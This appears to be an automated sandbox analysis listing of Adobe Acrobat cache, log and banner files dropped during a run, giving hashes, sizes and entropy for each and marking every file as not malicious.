SSDEEP: | 3:zGlllKYebyzKjjn13a/m431allcVO/lnlZMxZNQl:6lKzbEKj53qm43QOewk |
MD5: | 161CF120B73B246FB84B8B2592447B89 |
SHA1: | 04E1C4F072F3314D5D091C9DCEE4FA14117C49ED |
SHA-256: | 42766A087CB3332B2B8076FEEB8215C5570E65D0CF61AE8CC0C142B63515AA8C |
SHA-512: | C7A9254BF1104EF345A2A0AA55A95C96E6487FFE3C61F1D36EFD19A3C3B83BB6B324A6D1D6AF35C560C9EF52C25119F981F1937E2EF839F8C4477892A10758FC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.1104614601495895 |
Encrypted: | false |
SSDEEP: | 6:iO4qXKRq2Pwkn2nKuAl9OmbnIFUtSqXPMVXZmwsqXPMVFkwOwkn2nKuAl9OmbjLJ:76vYfHAahFUtjw/J45JfHAaSJ |
MD5: | 49558129E6518785A3452E06A8BE6085 |
SHA1: | BF767DE0823B902FC328064D924B7D41A25B994A |
SHA-256: | 2E488850A491860679F8AC09818B563AA2D2A0C4DFA5D0632582450D76BD66AB |
SHA-512: | 4062C6D29DB5D5BF2BFD71607BEAEC24754BF6116FBEAB2BA492A7865D3101257EB34B8C14FF22433DFDD1954C9A671F836F0F163BA664BA4AFABF7A677B10BB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.1104614601495895 |
Encrypted: | false |
SSDEEP: | 6:iO4qXKRq2Pwkn2nKuAl9OmbnIFUtSqXPMVXZmwsqXPMVFkwOwkn2nKuAl9OmbjLJ:76vYfHAahFUtjw/J45JfHAaSJ |
MD5: | 49558129E6518785A3452E06A8BE6085 |
SHA1: | BF767DE0823B902FC328064D924B7D41A25B994A |
SHA-256: | 2E488850A491860679F8AC09818B563AA2D2A0C4DFA5D0632582450D76BD66AB |
SHA-512: | 4062C6D29DB5D5BF2BFD71607BEAEC24754BF6116FBEAB2BA492A7865D3101257EB34B8C14FF22433DFDD1954C9A671F836F0F163BA664BA4AFABF7A677B10BB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.148255227735417 |
Encrypted: | false |
SSDEEP: | 6:iO4qXPVq2Pwkn2nKuAl9Ombzo2jMGIFUtSqXmwgZmwsqXIIkwOwkn2nKuAl9OmbX:7NVvYfHAa8uFUtqwg/uI5JfHAa8RJ |
MD5: | BCFF86EE0C37D3C1E64309A0F520963D |
SHA1: | 29E4150820089CF2BE6FF988B7A87CC84A96E3A6 |
SHA-256: | 45D043EDFC0A21A300565C8F202643F06ADA4CF6E6F15A44A7EE966D1DD16A23 |
SHA-512: | EE3EADE6154F92B8719D3F2B020CB8BD4AF1343DDDCD7A597909CD5BD6066B828A540D5BE6D77F2A4812D01E0E8046D145D0A4E2880A98DBE995B5F0574A3C3C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.148255227735417 |
Encrypted: | false |
SSDEEP: | 6:iO4qXPVq2Pwkn2nKuAl9Ombzo2jMGIFUtSqXmwgZmwsqXIIkwOwkn2nKuAl9OmbX:7NVvYfHAa8uFUtqwg/uI5JfHAa8RJ |
MD5: | BCFF86EE0C37D3C1E64309A0F520963D |
SHA1: | 29E4150820089CF2BE6FF988B7A87CC84A96E3A6 |
SHA-256: | 45D043EDFC0A21A300565C8F202643F06ADA4CF6E6F15A44A7EE966D1DD16A23 |
SHA-512: | EE3EADE6154F92B8719D3F2B020CB8BD4AF1343DDDCD7A597909CD5BD6066B828A540D5BE6D77F2A4812D01E0E8046D145D0A4E2880A98DBE995B5F0574A3C3C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1bebf5f8-0014-44b0-b2d6-166731dab0a6.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.963716805413449 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqbWsBdOg2HVAcaq3QYiubInP7E4T3y:Y2sRdse7dMHVr3QYhbG7nby |
MD5: | B741523438B6EB06B055212DB1DAB952 |
SHA1: | C8A11B52614E5D8FD8C2CF92D8587B0FF9F64BA6 |
SHA-256: | 36222475CB80FE882826EE7FC6BB58C291D0779019A8EBE8DC8C09191DC98A93 |
SHA-512: | 2EB127EF2076DB38FAB77B1661E8C3D0143C0159468571B4B87A9BA94CE6492A3D11719082D3E2EB8E1734DEC0CBF736A2E02489F5CB9771186943FEE17BE244 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.963716805413449 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqbWsBdOg2HVAcaq3QYiubInP7E4T3y:Y2sRdse7dMHVr3QYhbG7nby |
MD5: | B741523438B6EB06B055212DB1DAB952 |
SHA1: | C8A11B52614E5D8FD8C2CF92D8587B0FF9F64BA6 |
SHA-256: | 36222475CB80FE882826EE7FC6BB58C291D0779019A8EBE8DC8C09191DC98A93 |
SHA-512: | 2EB127EF2076DB38FAB77B1661E8C3D0143C0159468571B4B87A9BA94CE6492A3D11719082D3E2EB8E1734DEC0CBF736A2E02489F5CB9771186943FEE17BE244 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.256582639691656 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Gu1GRP:etJCV4FiN/jTN/2r8Mta02fEhgO73go8 |
MD5: | 2CCD5EC79CD1F5B34FFA8A48BDA29D23 |
SHA1: | E309E852C7AFBF53E7BCB4CED4DDAC69FE449508 |
SHA-256: | 0928AA7A94C49F72254D03CBE34A1679FB3DAA5090FC9FC7894882C4699E0D12 |
SHA-512: | 47435A3F7849EBD75C50749CD1057DD8D22EC9558870E6A4A7EEA02A2EB8BB37372DF8D157E2759DF00C7EA75E5629075EE41A5899E30DEE7123D30BE24F9A56 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.160198690034444 |
Encrypted: | false |
SSDEEP: | 6:iO4qXQuwVq2Pwkn2nKuAl9OmbzNMxIFUtSqX+aDVSgZmwsqXoYIkwOwkn2nKuAlG:7auwVvYfHAa8jFUt4g/yYI5JfHAa84J |
MD5: | 737163570B2BA75F807B0D59BB362FC4 |
SHA1: | F098CE7A121896976F5C03CD55F36037BA95773A |
SHA-256: | C94A5F521CEE46E25959E4B813441ECFFBB829887B11C1B954127BB8799341A9 |
SHA-512: | 0C53F1EAEC26C77EB642CC2867CDCE16966392C27398E89ED2BA88E3D82E2D4FF8E7E5593EA700644F6DFE992AEE6EE9984BE950EEEF3992A75A9BC9E62F07D8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.160198690034444 |
Encrypted: | false |
SSDEEP: | 6:iO4qXQuwVq2Pwkn2nKuAl9OmbzNMxIFUtSqX+aDVSgZmwsqXoYIkwOwkn2nKuAlG:7auwVvYfHAa8jFUt4g/yYI5JfHAa84J |
MD5: | 737163570B2BA75F807B0D59BB362FC4 |
SHA1: | F098CE7A121896976F5C03CD55F36037BA95773A |
SHA-256: | C94A5F521CEE46E25959E4B813441ECFFBB829887B11C1B954127BB8799341A9 |
SHA-512: | 0C53F1EAEC26C77EB642CC2867CDCE16966392C27398E89ED2BA88E3D82E2D4FF8E7E5593EA700644F6DFE992AEE6EE9984BE950EEEF3992A75A9BC9E62F07D8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444766436474621 |
Encrypted: | false |
SSDEEP: | 384:SeTci5tOiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rhs3OazzU89UTTgUL |
MD5: | 5EDB74D4CAB86B8D48D6EAD6943D77CB |
SHA1: | 46010EE6751B6A76E526413010506BDBD32AAB22 |
SHA-256: | 1D97C9B9C0FB9861CD27BF6AFDEAD707426AE3598D23C14686DD9EEE2E2F6D30 |
SHA-512: | 28CEC78269A9FF75EF6DD6457C34CCDF4CFF9E064969BE5593CC7EE08032BC16F277FF4B4AB7DE3A168BBB1EA956127FE18C91EDD3C65BF46087595299104621 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213970247310631 |
Encrypted: | false |
SSDEEP: | 24:7+txjnuwKaqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mp:7MpnCaqvmFTIF3XmHjBoGGR+jMz+LhM |
MD5: | A3692EF68F93234AB4160F331930621D |
SHA1: | 0DE71F29EBE46537230D03662F1D8121B5874A13 |
SHA-256: | E949F881BF419CFFE995365A6A8EDE1B85EAAA2C2AFDDB1B9A47A58F33D0C201 |
SHA-512: | 4D0C57222E4B0E7296EE5AEAADE36C87BA7791FCFD4B350C9664234710DF9CC11F12E9594B64B1F785C60F84A5644D5C2B52AD269298CBC80A9C4871CAF5D3D3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklRyWllltfllXlE/HT8kygzllXNNX8RolJuRdxLlGB9lQRYwpDdt:kKw/eT8kJldNMa8RdWBwRd |
MD5: | FE2C0CF81D62B5AF7CA7171D44BF7BDC |
SHA1: | 157E1956499ED36E2607D4AC8595ACE8EB400A36 |
SHA-256: | 74A6F64B2B085D2F12AC0BD536C53B18A93BC6B115E131626CE6DAB910583107 |
SHA-512: | 6C8C5C78B2BFF2F26D0E27AC65B52B7850E0A6C1B400DED5C8172520BCBD7D202FC9290EB54BE750D80DA5DCB11BB516DEC7D62FDA7961563B09EAD08D30E85B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.362351650129759 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJM3g98kUwPeUkwRe9:YvXKXR1zZc0vBkGMbLUkee9 |
MD5: | AEDACD061E3355F36BAA8DF5A2922F21 |
SHA1: | C38CA1E2F408D3AEAA02736ED49702AAF8149DB7 |
SHA-256: | 0FEDB5A599965781B7A86813F066A9AD6C9360B709DA6AE198598163883FC8E2 |
SHA-512: | 14EBD02041D2B60B59894B296FA8AFA1B7B5469CBFDAB02559F34AF5097085217439BF9E8092092389912B0156B8BCE52ADD48DBF0C0F8540FC6FD51128DDF33 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.312343726547828 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfBoTfXpnrPeUkwRe9:YvXKXR1zZc0vBkGWTfXcUkee9 |
MD5: | 171E52FF23C170225E0BF03B96878B55 |
SHA1: | 283BC00188843E0FFD75621403F4B66E71DEF3EA |
SHA-256: | C75C5259E30697163CC2C570F31B1FDB7DDF20CB979A7B55DB02B3FC56C7C802 |
SHA-512: | 7FC6F28D3CAB904058D3B42EC20FD02FAC12CAFE7A199126790511B5C6F3B4D681475A5228656F6D1CD978099C54C80C0212321563EBA1D18DC927985838F340 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.290892043073834 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfBD2G6UpnrPeUkwRe9:YvXKXR1zZc0vBkGR22cUkee9 |
MD5: | 41D6143838FF6BCB3C2AD6D4C51191F4 |
SHA1: | 1D2296C1F3865B6E4A71B778705D569E0E51FB97 |
SHA-256: | 508F1709851CC6CDFB76D337A32C02D3673135DE2B36A0DE24C48186BE2645FB |
SHA-512: | DA2ABEE7A1B166E7C7DA762D4ACDCD8B5421D0550F4280344906AFB7612C8F48B498EE274C50F964CA1133E2FD71B9F81DFD651D3B59193EEEAAEBDA0F667761 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.349326656809569 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfPmwrPeUkwRe9:YvXKXR1zZc0vBkGH56Ukee9 |
MD5: | 93ED93CEDE9992864ACE5F13FC3C9774 |
SHA1: | AFF30E9C24E3F24A68828BE46E1FBFA24A031487 |
SHA-256: | 7AFBA340E7554D278691C7F1F6B2074D71FA07CC94588053BE4D0D48DF34228F |
SHA-512: | 47AED175C260BA4B5B374A6F8AD83726E2408976E30964AF318ED72DCCF95BCA59CA0CEDBC75930B70CAC5408C340141D3414C9F7184C9312B0239CC73944F8F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.692349728433444 |
Encrypted: | false |
SSDEEP: | 24:Yv6XR1zzvBhpLgE9cQx8LennAvzBvkn0RCmK8czOCCS4:Yvm1/bhgy6SAFv5Ah8cv/4 |
MD5: | 49C388F198CDF568FE6530194AE52B56 |
SHA1: | BE0A26A87440E673BE16698D466D35FC75CA8FB5 |
SHA-256: | 4A24ECF33AF5FB886EB7A1F8BC631CD66DCB8C098CD69C070488A54CE540D3B7 |
SHA-512: | 85E2BDB051889FCDC1C27139AE6FC631DBE00E02C40E54672F8EF0E7F8E044054484F8FACB03FDC4558491A48B109A9AA911DB5D09E9F6889E6BD9CAE04F1F34 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.298691401625906 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJf8dPeUkwRe9:YvXKXR1zZc0vBkGU8Ukee9 |
MD5: | D47EA63D642A728C5F720DE38CC5209D |
SHA1: | 0B01E6B92F3F35995EBDF144AA2C7C2E8214BF50 |
SHA-256: | 1D09660FF64BFF8C5F62A487C7BC654BBDEE15960F4A0B3992338ABACD42541D |
SHA-512: | 38F0722E5F8D2B29CA849825D15F6205A0DAC7A9D16A3E4E5C26CFB1CA27A4F8CC472E4C771D34685D4C988E42DCA28482B56673325E38F1238FFBE5519ECE4B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.302296484372633 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfQ1rPeUkwRe9:YvXKXR1zZc0vBkGY16Ukee9 |
MD5: | 081FF985C639A6F67E90558DB4C76ECD |
SHA1: | 8348EE6478816770E1DBEF678F929CD5D0454893 |
SHA-256: | 546DE12E6DEE817542E2A79B1A9E65988E61F065B0734AF79A76B0F4BB5BC901 |
SHA-512: | F4A14639F79DB35DE752F509DFD9008F97041DF2DB3DB78883087DD439982763CD5171703247BA842EAC3CB4D374D740FD956994A8DD127B8A59774D4C1254FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.310260997904955 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfFldPeUkwRe9:YvXKXR1zZc0vBkGz8Ukee9 |
MD5: | 852959E90F918B17CBC04A31B23E09C5 |
SHA1: | 0033B6A7E64B1C6D78D36B5077F0B082F1B6DDCC |
SHA-256: | F00A76F566AB06844CABD525527B0952F3A063EC8E45EF059B8E2CB1088257B6 |
SHA-512: | 44790173A1ED7B84335DEF69128DB56FA99BF529BF34A0A33C87DB19865EA2D9CB758CDE1ED05BDD6F2F74CB753A883F911AFABC70D5C189CCF92E26F3C9C600 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.324525001117969 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfzdPeUkwRe9:YvXKXR1zZc0vBkGb8Ukee9 |
MD5: | F2C8FBB90D9198257B67205841AEC49D |
SHA1: | AF4B12FE5145E9576D549F24B225347BDC3DC972 |
SHA-256: | FD525D640A43520689A3ED4395758F101356D56AC8A7D64E883D195E8866AEE7 |
SHA-512: | 54019B5693A6E98D4A820B112F168A294E14C054E6CFE770EF32700C577984E180552EAA52D233EA0FC6C1D4BDA7865895722E58DF031F10A0469BB96CB22F6D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.304982082499775 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfYdPeUkwRe9:YvXKXR1zZc0vBkGg8Ukee9 |
MD5: | BED77E200C889B29E68737EA2740CC0B |
SHA1: | A5928C17561FEB487AD91BBA7303BEB9E518F815 |
SHA-256: | 90C8A63FFAB4118AA6E523684AD34FC9F89AA6102D3C4D4CAC125A8DB10DE608 |
SHA-512: | 08247B75579692CE936B6A21552EEC23C80ED545F762350724E6C1B9A79E81BBDAD1FCA5FE50AF7EFD7CCA7F461CEFB6A65FD236DB485A5B45935B9F76ACD814 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.291419158970355 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJf+dPeUkwRe9:YvXKXR1zZc0vBkG28Ukee9 |
MD5: | 2CA1ABB8D1D976A7292CE5823DB87FBD |
SHA1: | 7C0293A3DC4F4D10EED4F1EB8E618AA15C82196D |
SHA-256: | 9ED2743417C74C4D5AB202182BA2313A9BA14226461B7CEFC65147F88FD968E2 |
SHA-512: | FCA90A28A3107759A50B450BEACCC4519180CDDF1FB7D01029FCA159F26F2617F2AC4C0C5C72EFC56D1D422FA0607338614C7573714883F815B6D179F3E5D1F7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.288494939056801 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJfbPtdPeUkwRe9:YvXKXR1zZc0vBkGDV8Ukee9 |
MD5: | 3BF2866B22245E8653AAC1EEC93CDFE3 |
SHA1: | 50B853B6DCEA0E525FE2D1FC5CBA3F74A9BE674A |
SHA-256: | 7FDA980573F700C4A8DD92BBA2F503D42834139614EE265F75E342AB3A6C57C9 |
SHA-512: | 276B9E2394D2B34C96CA6EA10CE0325C9F11DDCC2897FBA9B7C8C4C2925531BEA0D05DC050C4BDFB8A3137E2FEDC79B87234AA59C3FECD96DD7BC2BBD6B0ACE9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.292900970543717 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXQEzIwlCVoZcg1vRcR0Y27oAvJf21rPeUkwRe9:YvXKXR1zZc0vBkG+16Ukee9 |
MD5: | 4874E32AE45D2FE86B8C77108B9E90C1 |
SHA1: | 57C7BB1BD43F363F7EA2174BCC8E44A7242350C5 |
SHA-256: | ED8C4A533B965DED0EA204E4E00CE92E3EF3EC448FAE16579116F350A1700324 |
SHA-512: | 3ECAEF45DAA8687E43A8C873154681F1F154C6B00A05F6D4E04B905CFFABDCD017F3D9E067BA875FF72109BAA2E6B32420FBEB3F24F895C91CBE16B926AB1D62 |
Malicious: | false |
Preview: |
